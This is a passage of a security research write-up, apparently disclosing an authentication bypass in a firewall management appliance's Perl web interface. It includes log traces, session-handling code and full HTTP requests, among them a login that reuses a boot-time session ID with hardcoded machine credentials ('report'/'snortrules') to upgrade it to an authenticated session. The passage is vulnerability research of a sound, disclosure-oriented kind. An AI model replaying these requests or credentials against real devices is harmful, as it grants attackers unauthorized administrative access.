[csm_processes] does not have page permission [configuration]. Access denied. at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 3268.\n[2026-03-25 19:41:46.04675] [14601] [info] Unauthorized access to \u002Fplatinum\u002FApplianceInformation.cgi\n called from SF::Util::Stacktrace::ToString at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 119\n called from SF::Mojo::CommonUtils::Unauthorized at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 266\n called from SF::Mojo::CommonUtils::handle_auth at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FHandlers\u002FApplianceInformationHandler.pm, line 19\n...snip...\n called from Mojo::Server::Prefork::_spawn at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 100\n called from Mojo::Server::Prefork::_manage at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 85\n called from Mojo::Server::Prefork::run at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FHypnotoad.pm, line 74\n called from Mojo::Server::Hypnotoad::run at \u002Fusr\u002Flocal\u002Fsf\u002Fbin\u002Fmojo_server_wrapper.pl, line 38\n[2026-03-25 19:41:46.04803] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:46.04806] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04822] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04829] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.21809] [14601] [info] Use of uninitialized value in string eq at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAmplitude.pm line 40.\n[2026-03-25 19:41:48.22680] [14601] [debug] 200 OK (2.188507s, 0.457\u002Fs)\n[2026-03-25 19:41:48.22691] [14601] [debug] after dispatch worker inspection\n",[1277,3675,3673],{"__ignoreMap":148},[184,3677,3678],{},"As it turns out, nearly every CGI page of the application contains a snippet similar to the following:",[1449,3680,3682],{"className":1465,"code":3681,"language":1467,"meta":148,"style":148},"use SF::Auth;\nmy $session = SF::Auth::GetSession($cgi);\nSF::Auth::CheckLogin($cgi, $session);\n",[1277,3683,3684,3691,3706],{"__ignoreMap":148},[1471,3685,3686,3688],{"class":1473,"line":1474},[1471,3687,1834],{"class":1483},[1471,3689,3690],{"class":1487}," SF::Auth;\n",[1471,3692,3693,3696,3698,3701,3703],{"class":1473,"line":149},[1471,3694,3695],{"class":1501},"my",[1471,3697,1505],{"class":1491},[1471,3699,3700],{"class":1487},"session = SF::Auth::GetSession(",[1471,3702,1492],{"class":1491},[1471,3704,3705],{"class":1487},"cgi);\n",[1471,3707,3708,3711,3713,3716,3718],{"class":1473,"line":1498},[1471,3709,3710],{"class":1487},"SF::Auth::CheckLogin(",[1471,3712,1492],{"class":1491},[1471,3714,3715],{"class":1487},"cgi, ",[1471,3717,1492],{"class":1491},[1471,3719,1802],{"class":1487},[184,3721,3722,3723,3726,3727,3730,3731,3734,3735,3738,3739,3741,3742,3745],{},"Internally to the application, the current session username is cross-referenced with the permission logic ",[1277,3724,3725],{},"Permission.pm"," module, and uses the permissions assigned to the user for whenever ",[1277,3728,3729],{},"CheckLogin"," is run. This means we can pass the basic authentication check for any page that only uses ",[1277,3732,3733],{},"SF::Auth::GetSession",", but any calls to ",[1277,3736,3737],{},"SF::Auth::CheckLogin"," or a direct permission check will have to have permissions of the user. Well what does our ",[1277,3740,1279],{}," user permission have? None. Turns out the machine user does ",[1374,3743,3744],{},"not"," have any permissions assigned, and we are functionally restricted to the lowest-privileged user account.",[184,3747,3748],{},"This immediately presented a huge problem, as we generally could not interact with any of the APIs or CGI scripts (with very few exceptions). We began to attempt to check authentication logic for a few set of entry points, testing as many as we could find and cross-referencing what a normal admin UI user would be able to interact with.",[184,3750,3751,3752,3755],{},"Testing showed that we only had access to a small handful of API calls that checked session validity, a few CGI scripts, and not a single one of the ",[1277,3753,3754],{},"\u002Fapi"," routes in Apache. We got stuck here for quite a while attempting to find what we could access with our minimally privileged user, as the words \"successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device\" echoed in our heads.",[184,3757,3758,3759,3761,3762,3764],{},"Our UI login testing and cross referencing with the ",[1277,3760,1279],{}," session showed a couple of exceptions to the ",[1277,3763,3729],{}," logic that stood out:",[227,3766,3767,3780],{},[230,3768,1292,3769,3771,3772,3775,3776,3779],{},[1277,3770,1329],{}," script that appears to be used for bulk API requests does not directly check logins, only sessions; but then it cross-references the permissions that are callable with a set of permission maps to functions defined in ",[1277,3773,3774],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FPJB.pm",". This includes a special ",[1277,3777,3778],{},"all"," permission.",[230,3781,1292,3782,3785,3786,3789],{},[1277,3783,3784],{},"sajaxintf.cgi"," script handles async AJAX requests; it has a set of functions that any user appears to be able to call, and that correlate to functions defined in ",[1277,3787,3788],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," that individually appear to perform most of their logic.",[184,3791,3792,3793,3795,3796,3799],{},"Great, those sound like perfect candidates, but both of these APIs have odd interfaces. For ",[1277,3794,3784],{},", requests are sent as a JSON array, and the ordered arguments correlate to the application functions and their arguments. The following call sends a request to the ",[1277,3797,3798],{},"batchResults"," function. All the following parameters are arguments for that function:",[1449,3801,3803],{"className":3138,"code":3802,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 143\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n[\"a490cd6e67ccde81d131684846d7a13c\",\"batchResults\",null,10000,\"getRulesForCategory\",\"policy_modifications\",\"\",\"\",\"Category::browser-chrome\",\"\"]\n",[1277,3804,3805,3819,3827,3836,3845,3855,3864,3872,3882,3890,3894],{"__ignoreMap":148},[1471,3806,3807,3810,3813,3815,3817],{"class":1473,"line":1474},[1471,3808,3809],{"class":1483},"POST",[1471,3811,3812],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 ",[1471,3814,3153],{"class":2247},[1471,3816,55],{"class":1487},[1471,3818,3158],{"class":2328},[1471,3820,3821,3823,3825],{"class":1473,"line":149},[1471,3822,3164],{"class":3163},[1471,3824,1447],{"class":2247},[1471,3826,3169],{"class":1527},[1471,3828,3829,3831,3833],{"class":1473,"line":1498},[1471,3830,3428],{"class":3163},[1471,3832,1447],{"class":2247},[1471,3834,3835],{"class":1527}," CGISESSID=199ceac425aaa91610edd959ce049568\n",[1471,3837,3838,3840,3842],{"class":1473,"line":1536},[1471,3839,3274],{"class":3163},[1471,3841,1447],{"class":2247},[1471,3843,3844],{"class":1527}," 143\n",[1471,3846,3847,3850,3852],{"class":1473,"line":1546},[1471,3848,3849],{"class":3163},"Accept-Language",[1471,3851,1447],{"class":2247},[1471,3853,3854],{"class":1527}," en-US,en;q=0.9\n",[1471,3856,3857,3859,3861],{"class":1473,"line":1580},[1471,3858,3254],{"class":3163},[1471,3860,1447],{"class":2247},[1471,3862,3863],{"class":1527}," application\u002Fjson\n",[1471,3865,3866,3868,3870],{"class":1473,"line":1612},[1471,3867,3174],{"class":3163},[1471,3869,1447],{"class":2247},[1471,3871,3179],{"class":1527},[1471,3873,3874,3877,3879],{"class":1473,"line":1624},[1471,3875,3876],{"class":3163},"Accept",[1471,3878,1447],{"class":2247},[1471,3880,3881],{"class":1527}," *\u002F*\n",[1471,3883,3884,3886,3888],{"class":1473,"line":1648},[1471,3885,3194],{"class":3163},[1471,3887,1447],{"class":2247},[1471,3889,3199],{"class":1527},[1471,3891,3892],{"class":1473,"line":1654},[1471,3893,3383],{"emptyLinePlaceholder":54},[1471,3895,3896,3899,3901,3903,3905,3907,3909,3911,3913,3915,3919,3921,3924,3926,3928,3931,3933,3935,3937,3940,3942,3944,3947,3949,3951,3953,3955,3958,3960,3962,3964],{"class":1473,"line":1662},[1471,3897,3898],{"class":1491},"[",[1471,3900,1767],{"class":1523},[1471,3902,2594],{"class":1527},[1471,3904,1767],{"class":1523},[1471,3906,2298],{"class":1491},[1471,3908,1767],{"class":1523},[1471,3910,3798],{"class":1527},[1471,3912,1767],{"class":1523},[1471,3914,2298],{"class":1491},[1471,3916,3918],{"class":3917},"sMTiH","null",[1471,3920,2298],{"class":1491},[1471,3922,3923],{"class":2328},"10000",[1471,3925,2298],{"class":1491},[1471,3927,1767],{"class":1523},[1471,3929,3930],{"class":1527},"getRulesForCategory",[1471,3932,1767],{"class":1523},[1471,3934,2298],{"class":1491},[1471,3936,1767],{"class":1523},[1471,3938,3939],{"class":1527},"policy_modifications",[1471,3941,1767],{"class":1523},[1471,3943,2298],{"class":1491},[1471,3945,3946],{"class":1523},"\"\"",[1471,3948,2298],{"class":1491},[1471,3950,3946],{"class":1523},[1471,3952,2298],{"class":1491},[1471,3954,1767],{"class":1523},[1471,3956,3957],{"class":1527},"Category::browser-chrome",[1471,3959,1767],{"class":1523},[1471,3961,2298],{"class":1491},[1471,3963,3946],{"class":1523},[1471,3965,3966],{"class":1491},"]\n",[184,3968,3969,3970,3972,3973,3976,3977,3980,3981,3984,3985,3988],{},"Meanwhile, the ",[1277,3971,1329],{}," script has a similar interface, but instead uses form value fields and a ",[1277,3974,3975],{},"parameter"," field that contains the JSON array field that corresponds to a Perl object. In the following example the ",[1277,3978,3979],{},"SF::IdentityPolicy::IdentityPolicy::getPolicyList"," function is called and ",[1277,3982,3983],{},"parameters"," is an encoded empty JSON array (",[1277,3986,3987],{},"[]",") indicating no arguments are passed:",[1449,3990,3992],{"className":3138,"code":3991,"language":3140,"meta":148,"style":148},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 177\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n&function=SF::IdentityPolicy::IdentityPolicy::getPolicyList¶meters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[1277,3993,3994,4007,4015,4023,4032,4040,4049,4057,4065,4073,4077],{"__ignoreMap":148},[1471,3995,3996,3998,4001,4003,4005],{"class":1473,"line":1474},[1471,3997,3809],{"class":1483},[1471,3999,4000],{"class":1487}," \u002Fpjb.cgi ",[1471,4002,3153],{"class":2247},[1471,4004,55],{"class":1487},[1471,4006,3158],{"class":2328},[1471,4008,4009,4011,4013],{"class":1473,"line":149},[1471,4010,3164],{"class":3163},[1471,4012,1447],{"class":2247},[1471,4014,3169],{"class":1527},[1471,4016,4017,4019,4021],{"class":1473,"line":1498},[1471,4018,3428],{"class":3163},[1471,4020,1447],{"class":2247},[1471,4022,3835],{"class":1527},[1471,4024,4025,4027,4029],{"class":1473,"line":1536},[1471,4026,3274],{"class":3163},[1471,4028,1447],{"class":2247},[1471,4030,4031],{"class":1527}," 177\n",[1471,4033,4034,4036,4038],{"class":1473,"line":1546},[1471,4035,3849],{"class":3163},[1471,4037,1447],{"class":2247},[1471,4039,3854],{"class":1527},[1471,4041,4042,4044,4046],{"class":1473,"line":1580},[1471,4043,3254],{"class":3163},[1471,4045,1447],{"class":2247},[1471,4047,4048],{"class":1527}," application\u002Fx-www-form-urlencoded\n",[1471,4050,4051,4053,4055],{"class":1473,"line":1612},[1471,4052,3174],{"class":3163},[1471,4054,1447],{"class":2247},[1471,4056,3179],{"class":1527},[1471,4058,4059,4061,4063],{"class":1473,"line":1624},[1471,4060,3876],{"class":3163},[1471,4062,1447],{"class":2247},[1471,4064,3881],{"class":1527},[1471,4066,4067,4069,4071],{"class":1473,"line":1648},[1471,4068,3194],{"class":3163},[1471,4070,1447],{"class":2247},[1471,4072,3199],{"class":1527},[1471,4074,4075],{"class":1473,"line":1654},[1471,4076,3383],{"emptyLinePlaceholder":54},[1471,4078,4079,4082,4085],{"class":1473,"line":1662},[1471,4080,4081],{"class":1516},"&",[1471,4083,4084],{"class":1487},"function=",[1471,4086,4087],{"class":1527},"SF::IdentityPolicy::IdentityPolicy::getPolicyList¶meters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[184,4089,4090,4091,4093,4094,4096,4097,4099,4100,4102,4103,4105,4106,4108],{},"As you may have noticed, both requests contain the value ",[1277,4092,2594],{},", the first in the first array parameter and the second in the ",[1277,4095,1306],{}," parameter. This is where the next hurdle comes into play, because this value acts as a CSRF token that is tied to user sessions. Looking at the original startup-created session SQL response, we see that the ",[1277,4098,2663],{}," user session has the ",[1277,4101,1306],{}," value set, and the ",[1277,4104,1279],{}," session does not. This means that if we make a request to those endpoints, we will not be able to pass any of the basic validation checks, because that session does not have the ",[1277,4107,1306],{}," value set. This results in the inability to call any of the functions in these applications and also causes almost all API calls to fail uniformly. These also correlate directly to the session value so are not reusable between user sessions.",[184,4110,4111,4112,4114],{},"We need to get a ",[1277,4113,1306],{}," or a permission upgrade to be able to functionally do anything beyond version checking.",[246,4116,4118],{"id":4117},"session-upgrade","Session Upgrade",[184,4120,4121,4122,4125,4126,4128,4129,4131,4132,4134,4135,4138],{},"Our first thought was to look at all the session value manipulations and any interactions with permissions, which turned out to be a dead end: In our testing, there were almost no session manipulations that could occur unauthenticated. Our second idea was to look at other APIs and reverse ",[1277,4123,4124],{},"auth-daemon"," for any interactions. Midway through that long process and many failed sinks, something occurred to me. The ",[1277,4127,1279],{}," session value isn't inherently tied to the ",[1277,4130,1279],{}," authentication. According to the ",[1277,4133,1823],{}," code, an authentication to the login page would happily take an existing session value and make a new session for the user — ",[1374,4136,4137],{},"and"," it would happily initialize a set of options on the existing session:",[1449,4140,4142],{"className":1465,"code":4141,"language":1467,"meta":148,"style":148},"my $authing = 0;\nsub GetSession {\n my ($q, $silent) = @_;\n #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n\n # Return the cached session if we have one\n return $_SESSION if (defined $_SESSION);\n\n $q = new SF if !defined $q;\n\n # If they were fishing for a cached session but there isn't one, return no session\n my $sid;\n if (ref($q) eq 'Mojo::Message::Request') {\n $sid = find_session_id_from_cookies($q->cookies);\n } else {\n # Get the session ID from the cookie\n $sid = $q->cookie($CGI::Session::NAME);\n }\n return undef if !defined $sid;\n\n # Initialize sfclient\n return undef if (sfclient::sfclient_Init() != 0);\n\n # Cache the session and return it\n $_SESSION = MakeSession($sid, $silent);\n if (ref($q) eq 'Mojo::Message::Request') {\n $CURRENT_REQ_URL = $q->url->path->to_string;\n $CURRENT_REQ_METHOD = $q->method;\n setCurrentReqParams($q->params->to_hash);\n }\n else {\n $CURRENT_REQ_URL = $q->url( -absolute => 1);\n $CURRENT_REQ_METHOD = $q->request_method;\n setCurrentReqParams(scalar $q->Vars());\n }\n return $_SESSION;\n}\n",[1277,4143,4144,4153,4165,4186,4191,4195,4200,4218,4222,4242,4246,4251,4260,4284,4300,4308,4313,4334,4338,4356,4360,4365,4382,4386,4391,4407,4432,4459,4476,4496,4501,4509,4533,4549,4570,4575,4583],{"__ignoreMap":148},[1471,4145,4146,4148,4150],{"class":1473,"line":1474},[1471,4147,3695],{"class":1501},[1471,4149,1505],{"class":1491},[1471,4151,4152],{"class":1487},"authing = 0;\n",[1471,4154,4155,4159,4163],{"class":1473,"line":149},[1471,4156,4158],{"class":4157},"srJo8","sub",[1471,4160,4162],{"class":4161},"sD0ED"," GetSession",[1471,4164,1621],{"class":1487},[1471,4166,4167,4169,4171,4173,4175,4177,4180,4183],{"class":1473,"line":1498},[1471,4168,1502],{"class":1501},[1471,4170,1488],{"class":1487},[1471,4172,1492],{"class":1491},[1471,4174,1797],{"class":1487},[1471,4176,1492],{"class":1491},[1471,4178,4179],{"class":1487},"silent) = ",[1471,4181,4182],{"class":1491},"@",[1471,4184,4185],{"class":1487},"_;\n",[1471,4187,4188],{"class":1473,"line":1536},[1471,4189,4190],{"class":1477}," #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n",[1471,4192,4193],{"class":1473,"line":1546},[1471,4194,3383],{"emptyLinePlaceholder":54},[1471,4196,4197],{"class":1473,"line":1580},[1471,4198,4199],{"class":1477}," # Return the cached session if we have one\n",[1471,4201,4202,4205,4208,4210,4212,4215],{"class":1473,"line":1612},[1471,4203,4204],{"class":1483}," return",[1471,4206,4207],{"class":1487}," $_SESSION ",[1471,4209,1484],{"class":1483},[1471,4211,1488],{"class":1487},[1471,4213,4214],{"class":1554},"defined",[1471,4216,4217],{"class":1487}," $_SESSION);\n",[1471,4219,4220],{"class":1473,"line":1624},[1471,4221,3383],{"emptyLinePlaceholder":54},[1471,4223,4224,4227,4230,4232,4235,4237,4239],{"class":1473,"line":1648},[1471,4225,4226],{"class":1491}," $",[1471,4228,4229],{"class":1487},"q = new SF ",[1471,4231,1484],{"class":1483},[1471,4233,4234],{"class":1487}," !",[1471,4236,4214],{"class":1554},[1471,4238,1505],{"class":1491},[1471,4240,4241],{"class":1487},"q;\n",[1471,4243,4244],{"class":1473,"line":1654},[1471,4245,3383],{"emptyLinePlaceholder":54},[1471,4247,4248],{"class":1473,"line":1662},[1471,4249,4250],{"class":1477}," # If they were fishing for a cached session but there isn't one, return no session\n",[1471,4252,4253,4255,4257],{"class":1473,"line":1673},[1471,4254,1502],{"class":1501},[1471,4256,1505],{"class":1491},[1471,4258,4259],{"class":1487},"sid;\n",[1471,4261,4262,4264,4266,4268,4270,4272,4274,4276,4278,4280,4282],{"class":1473,"line":1681},[1471,4263,1549],{"class":1483},[1471,4265,1488],{"class":1487},[1471,4267,1555],{"class":1554},[1471,4269,1558],{"class":1487},[1471,4271,1492],{"class":1491},[1471,4273,1563],{"class":1487},[1471,4275,1566],{"class":1554},[1471,4277,1569],{"class":1523},[1471,4279,1572],{"class":1527},[1471,4281,1524],{"class":1523},[1471,4283,1577],{"class":1487},[1471,4285,4286,4288,4291,4293,4295,4297],{"class":1473,"line":1691},[1471,4287,1583],{"class":1491},[1471,4289,4290],{"class":1487},"sid = find_session_id_from_cookies(",[1471,4292,1492],{"class":1491},[1471,4294,1591],{"class":1487},[1471,4296,1517],{"class":1516},[1471,4298,4299],{"class":1487},"cookies);\n",[1471,4301,4302,4304,4306],{"class":1473,"line":1699},[1471,4303,1615],{"class":1487},[1471,4305,1618],{"class":1483},[1471,4307,1621],{"class":1487},[1471,4309,4310],{"class":1473,"line":1705},[1471,4311,4312],{"class":1477}," # Get the session ID from the cookie\n",[1471,4314,4315,4317,4320,4322,4324,4326,4329,4331],{"class":1473,"line":1733},[1471,4316,1583],{"class":1491},[1471,4318,4319],{"class":1487},"sid = ",[1471,4321,1492],{"class":1491},[1471,4323,1591],{"class":1487},[1471,4325,1517],{"class":1516},[1471,4327,4328],{"class":1487},"cookie(",[1471,4330,1492],{"class":1491},[1471,4332,4333],{"class":1487},"CGI::Session::NAME);\n",[1471,4335,4336],{"class":1473,"line":1773},[1471,4337,1651],{"class":1487},[1471,4339,4340,4342,4345,4348,4350,4352,4354],{"class":1473,"line":1789},[1471,4341,4204],{"class":1483},[1471,4343,4344],{"class":1554}," undef",[1471,4346,4347],{"class":1483}," if",[1471,4349,4234],{"class":1487},[1471,4351,4214],{"class":1554},[1471,4353,1505],{"class":1491},[1471,4355,4259],{"class":1487},[1471,4357,4358],{"class":1473,"line":1805},[1471,4359,3383],{"emptyLinePlaceholder":54},[1471,4361,4362],{"class":1473,"line":50},[1471,4363,4364],{"class":1477}," # Initialize sfclient\n",[1471,4366,4367,4369,4371,4373,4376,4379],{"class":1473,"line":3639},[1471,4368,4204],{"class":1483},[1471,4370,4344],{"class":1554},[1471,4372,4347],{"class":1483},[1471,4374,4375],{"class":1487}," (sfclient::sfclient_Init",[1471,4377,4378],{"class":1491},"()",[1471,4380,4381],{"class":1487}," != 0);\n",[1471,4383,4384],{"class":1473,"line":3644},[1471,4385,3383],{"emptyLinePlaceholder":54},[1471,4387,4388],{"class":1473,"line":45},[1471,4389,4390],{"class":1477}," # Cache the session and return it\n",[1471,4392,4394,4397,4399,4402,4404],{"class":1473,"line":4393},25,[1471,4395,4396],{"class":1487}," $_SESSION = MakeSession(",[1471,4398,1492],{"class":1491},[1471,4400,4401],{"class":1487},"sid, ",[1471,4403,1492],{"class":1491},[1471,4405,4406],{"class":1487},"silent);\n",[1471,4408,4410,4412,4414,4416,4418,4420,4422,4424,4426,4428,4430],{"class":1473,"line":4409},26,[1471,4411,1549],{"class":1483},[1471,4413,1488],{"class":1487},[1471,4415,1555],{"class":1554},[1471,4417,1558],{"class":1487},[1471,4419,1492],{"class":1491},[1471,4421,1563],{"class":1487},[1471,4423,1566],{"class":1554},[1471,4425,1569],{"class":1523},[1471,4427,1572],{"class":1527},[1471,4429,1524],{"class":1523},[1471,4431,1577],{"class":1487},[1471,4433,4435,4437,4440,4442,4444,4446,4449,4451,4454,4456],{"class":1473,"line":4434},27,[1471,4436,1583],{"class":1491},[1471,4438,4439],{"class":1487},"CURRENT_REQ_URL = ",[1471,4441,1492],{"class":1491},[1471,4443,1591],{"class":1487},[1471,4445,1517],{"class":1516},[1471,4447,4448],{"class":1487},"url",[1471,4450,1517],{"class":1516},[1471,4452,4453],{"class":1487},"path",[1471,4455,1517],{"class":1516},[1471,4457,4458],{"class":1487},"to_string;\n",[1471,4460,4462,4464,4467,4469,4471,4473],{"class":1473,"line":4461},28,[1471,4463,1583],{"class":1491},[1471,4465,4466],{"class":1487},"CURRENT_REQ_METHOD = ",[1471,4468,1492],{"class":1491},[1471,4470,1591],{"class":1487},[1471,4472,1517],{"class":1516},[1471,4474,4475],{"class":1487},"method;\n",[1471,4477,4479,4482,4484,4486,4488,4491,4493],{"class":1473,"line":4478},29,[1471,4480,4481],{"class":1487}," setCurrentReqParams(",[1471,4483,1492],{"class":1491},[1471,4485,1591],{"class":1487},[1471,4487,1517],{"class":1516},[1471,4489,4490],{"class":1487},"params",[1471,4492,1517],{"class":1516},[1471,4494,4495],{"class":1487},"to_hash);\n",[1471,4497,4499],{"class":1473,"line":4498},30,[1471,4500,1651],{"class":1487},[1471,4502,4504,4507],{"class":1473,"line":4503},31,[1471,4505,4506],{"class":1483}," else",[1471,4508,1621],{"class":1487},[1471,4510,4512,4514,4516,4518,4520,4522,4525,4528,4530],{"class":1473,"line":4511},32,[1471,4513,1583],{"class":1491},[1471,4515,4439],{"class":1487},[1471,4517,1492],{"class":1491},[1471,4519,1591],{"class":1487},[1471,4521,1517],{"class":1516},[1471,4523,4524],{"class":1487},"url( -",[1471,4526,4527],{"class":1840},"absolute",[1471,4529,1844],{"class":1516},[1471,4531,4532],{"class":1487}," 1);\n",[1471,4534,4536,4538,4540,4542,4544,4546],{"class":1473,"line":4535},33,[1471,4537,1583],{"class":1491},[1471,4539,4466],{"class":1487},[1471,4541,1492],{"class":1491},[1471,4543,1591],{"class":1487},[1471,4545,1517],{"class":1516},[1471,4547,4548],{"class":1487},"request_method;\n",[1471,4550,4552,4554,4557,4559,4561,4563,4566,4568],{"class":1473,"line":4551},34,[1471,4553,4481],{"class":1487},[1471,4555,4556],{"class":1554},"scalar",[1471,4558,1505],{"class":1491},[1471,4560,1591],{"class":1487},[1471,4562,1517],{"class":1516},[1471,4564,4565],{"class":1487},"Vars",[1471,4567,4378],{"class":1491},[1471,4569,1533],{"class":1487},[1471,4571,4573],{"class":1473,"line":4572},35,[1471,4574,1651],{"class":1487},[1471,4576,4578,4580],{"class":1473,"line":4577},36,[1471,4579,4204],{"class":1483},[1471,4581,4582],{"class":1487}," $_SESSION;\n",[1471,4584,4586],{"class":1473,"line":4585},37,[1471,4587,1812],{"class":1487},[184,4589,4590,4591,4593,4594,4597],{},"The biggest issue was very much a chicken and egg problem: We needed credentials to be able to upgrade a session. Then while staring at the authentication code for the hundredth time, it occurred to me: The current session checks that are applied to the ",[1277,4592,1279],{}," session have the variables necessary for UI authentication. Attempting to use the hardcoded ",[1277,4595,4596],{},"csm_processes:csmdaemon"," credentials to log in, unfortunately, causes the session to immediately expire (as is stated in the session information), and the boot session is entirely removed, locking us out of the attack path.",[184,4599,4600,4601,4603,4604,4607,4608,4610],{},"But, there's no reason that the ",[1277,4602,1279],{}," session ID couldn't be upgraded by a ",[1374,4605,4606],{},"different"," machine user, and because the values are set to be able to pass UI authentication, all we had to do was take one of the hardcoded credentials that was not the ",[1277,4609,1279],{}," user and authentication would be happy even if it's a non-UI machine user.",[184,4612,4613,4614,4616,4617,4619,4620,4623,4624,4626],{},"Sure enough, we could authenticate with ",[1277,4615,1310],{}," credentials with the ",[1277,4618,3127],{}," session set, after which the ",[1277,4621,4622],{},"MakeSession"," function is called as the ",[1277,4625,1920],{}," user, the checks validate the machine user as a UI user, and the session values are updated.",[1449,4628,4630],{"className":3138,"code":4629,"language":3140,"meta":148,"style":148},"POST \u002Flogin.cgi?logon=Continue HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes;\nContent-Length: 43\nAccept-Language: en-US,en;q=0.9\nOrigin: https:\u002F\u002F10.0.0.226\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nConnection: keep-alive\n\nusername=report&password=snortrules&target=\n",[1277,4631,4632,4645,4653,4662,4671,4679,4689,4697,4705,4714,4722,4726],{"__ignoreMap":148},[1471,4633,4634,4636,4639,4641,4643],{"class":1473,"line":1474},[1471,4635,3809],{"class":1483},[1471,4637,4638],{"class":1487}," \u002Flogin.cgi?logon=Continue ",[1471,4640,3153],{"class":2247},[1471,4642,55],{"class":1487},[1471,4644,3158],{"class":2328},[1471,4646,4647,4649,4651],{"class":1473,"line":149},[1471,4648,3164],{"class":3163},[1471,4650,1447],{"class":2247},[1471,4652,3169],{"class":1527},[1471,4654,4655,4657,4659],{"class":1473,"line":1498},[1471,4656,3428],{"class":3163},[1471,4658,1447],{"class":2247},[1471,4660,4661],{"class":1527}," CGISESSID=csm_processes;\n",[1471,4663,4664,4666,4668],{"class":1473,"line":1536},[1471,4665,3274],{"class":3163},[1471,4667,1447],{"class":2247},[1471,4669,4670],{"class":1527}," 43\n",[1471,4672,4673,4675,4677],{"class":1473,"line":1546},[1471,4674,3849],{"class":3163},[1471,4676,1447],{"class":2247},[1471,4678,3854],{"class":1527},[1471,4680,4681,4684,4686],{"class":1473,"line":1580},[1471,4682,4683],{"class":3163},"Origin",[1471,4685,1447],{"class":2247},[1471,4687,4688],{"class":1527}," https:\u002F\u002F10.0.0.226\n",[1471,4690,4691,4693,4695],{"class":1473,"line":1612},[1471,4692,3254],{"class":3163},[1471,4694,1447],{"class":2247},[1471,4696,4048],{"class":1527},[1471,4698,4699,4701,4703],{"class":1473,"line":1624},[1471,4700,3174],{"class":3163},[1471,4702,1447],{"class":2247},[1471,4704,3179],{"class":1527},[1471,4706,4707,4709,4711],{"class":1473,"line":1648},[1471,4708,3876],{"class":3163},[1471,4710,1447],{"class":2247},[1471,4712,4713],{"class":1527}," text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1471,4715,4716,4718,4720],{"class":1473,"line":1654},[1471,4717,3194],{"class":3163},[1471,4719,1447],{"class":2247},[1471,4721,3199],{"class":1527},[1471,4723,4724],{"class":1473,"line":1662},[1471,4725,3383],{"emptyLinePlaceholder":54},[1471,4727,4728],{"class":1473,"line":1673},[1471,4729,4730],{"class":1487},"username=report&password=snortrules&target=\n",[184,4732,4733,4734,4736,4737,4740,4741,4743,4744,1447],{},"And the session values in the database are upgraded, the server responds with a successful authentication that redirects to the UI ",[1277,4735,55],{}," and a ",[1277,4738,4739],{},"Set-Cookie"," set to the already established (but now upgraded) 